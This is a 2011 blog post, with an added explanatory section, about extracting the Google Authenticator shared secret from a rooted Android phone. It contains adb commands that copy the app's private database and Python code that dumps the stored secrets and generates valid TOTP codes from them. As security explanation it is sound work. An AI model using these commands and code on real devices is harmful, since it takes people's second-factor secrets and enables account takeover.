June 3, 2011

  • i hax goog 2-step auth

    I just “hacked” Google’s 2-step authentication using an ADB shell and an instance of the repackaged/modified Google Authenticator app (and the Android SDK).

    Having 2-step authentication makes it harder for your account to be hijacked and for malicious users to pose as you. Instead of just guessing, stealing, or cracking your password (something only you’re supposed to know) to gain complete access to your account, they would additionally need your phone with the Google Authenticator app installed (something only you’re supposed to have). The app shows a fresh six-digit code every 30 seconds; the code is not random, it is an HMAC (the TOTP scheme) computed over the current 30-second time step with a secret that was shared between the app and Google when you enrolled. Google checks the code by computing the same thing on its side.

    It’s a well-known fact that smartphones today, whether iOS- or Android-based, are essentially computers. And yes, that means they are vulnerable to “viruses” and “malware” much the same as PCs are. In particular, one way for malicious software to get onto your smartphone is through repackaging a legitimate app and redistributing it through a third-party grey-market or non-official store (as opposed to the official Apple App Store or Android Market); sometimes such apps even sneak into the official markets. Once the malicious code is on your phone and has root access (via a jailbroken iOS device, a rooted Android device, an OS exploit, etc.), it has free rein to do whatever it wants: with root it can listen to your network traffic and read any file on the file system.

    In this simulated attack, even though Android apps are “sandboxed” from one another through file ownership (each app runs as its own Linux user and group, e.g. app_321, and its private files are readable only by that user), a root user has no such restrictions. Simply copy the Authenticator app’s SQLite database file off the device, examine and/or manipulate it with the sqlite3 tool, and the attacker now has your shared secret, which sits in that file in readable form. Since every code is derived from that secret and the current time, anyone holding a copy of it can generate exactly the codes your phone shows and impersonate you as often as he pleases; the second factor offers no further protection once the seed has left the phone.
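As an added example (this is not code from the original post, nor the Authenticator app’s own code), the following Python reconstructs both halves of the argument above: the copied-out database and the code derivation. The table layout it uses (a table `accounts` with `email` and `secret` columns, the secret stored as a base32 string) is an assumption modelled on the open-source Authenticator app, the account row is constructed sample data using the RFC 4226/6238 test key, and the `adb` commands and device path in the comments are assumptions about how the copy step would look; the code derivation itself follows RFC 6238 TOTP over HMAC-SHA1, which is what the app implements.

```python
import base64
import hashlib
import hmac
import sqlite3
import struct
import time

# Constructed sample data, not taken from a real device. The table layout
# (table "accounts" with "email" and "secret" columns, secret as base32) is an
# assumption modelled on the open-source Google Authenticator app. The copy
# step the post describes would look roughly like this on a rooted device
# (package name and path are also assumptions):
#   adb shell su -c "cp /data/data/<authenticator package>/databases/databases /sdcard/"
#   adb pull /sdcard/databases
SAMPLE_EMAIL = "victim@example.com"
# base32 of the ASCII key "12345678901234567890" used by the RFC 4226/6238 test vectors
SAMPLE_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def build_sample_db():
    """Stand-in for the Authenticator database file copied off the phone."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (_id INTEGER PRIMARY KEY, email TEXT, "
        "secret TEXT, counter INTEGER, type INTEGER)"
    )
    conn.execute(
        "INSERT INTO accounts (email, secret, counter, type) VALUES (?, ?, ?, ?)",
        (SAMPLE_EMAIL, SAMPLE_SECRET_B32, 0, 0),
    )
    conn.commit()
    return conn


def dump_secrets(conn):
    """What the attacker does with the copied DB: read every shared secret.

    This is the whole 'exploit': the seed sits in the file as a base32 string,
    so anyone who can read the file can generate codes for that account.
    """
    return [(email, secret)
            for email, secret in conn.execute("SELECT email, secret FROM accounts")]


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1(secret, counter) -> dynamic truncation -> decimal."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    binary = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret_b32, unix_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP over the 30-second time step (Authenticator's default)."""
    return hotp(secret_b32, int(unix_time) // step, digits)


def impersonation_codes(conn, unix_time):
    """Codes the attacker can present for each stolen account at a given moment."""
    return {email: totp(secret, unix_time) for email, secret in dump_secrets(conn)}


if __name__ == "__main__":
    # Self-check against the published RFC test vectors before trusting the output.
    assert hotp(SAMPLE_SECRET_B32, 0) == "755224"
    assert hotp(SAMPLE_SECRET_B32, 1) == "287082"
    assert totp(SAMPLE_SECRET_B32, 59) == "287082"  # RFC 6238: T=59 -> counter 1

    db = build_sample_db()
    for email, secret in dump_secrets(db):
        print("stolen secret for %s: %s" % (email, secret))
    print("codes valid right now:", impersonation_codes(db, time.time()))
```

Run as a script, it first confirms the derivation against the RFC 4226/6238 test vectors and then prints, for the constructed account, the code that the victim’s phone would be showing at that same moment. The point to take away is that the secret string is the only thing standing behind the second factor: a copy of the database is equivalent to a copy of the phone, and the attacker never needs to touch the device again.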

    Screenshot here, with sensitive commands and output redacted (image not reproduced in this copy):

    Edit: 2011.06.14 – Here is a published Android exploit that an attacker could use in conjunction with this technique to compromise Google Authenticator. It’s just one example; there are many others out there.
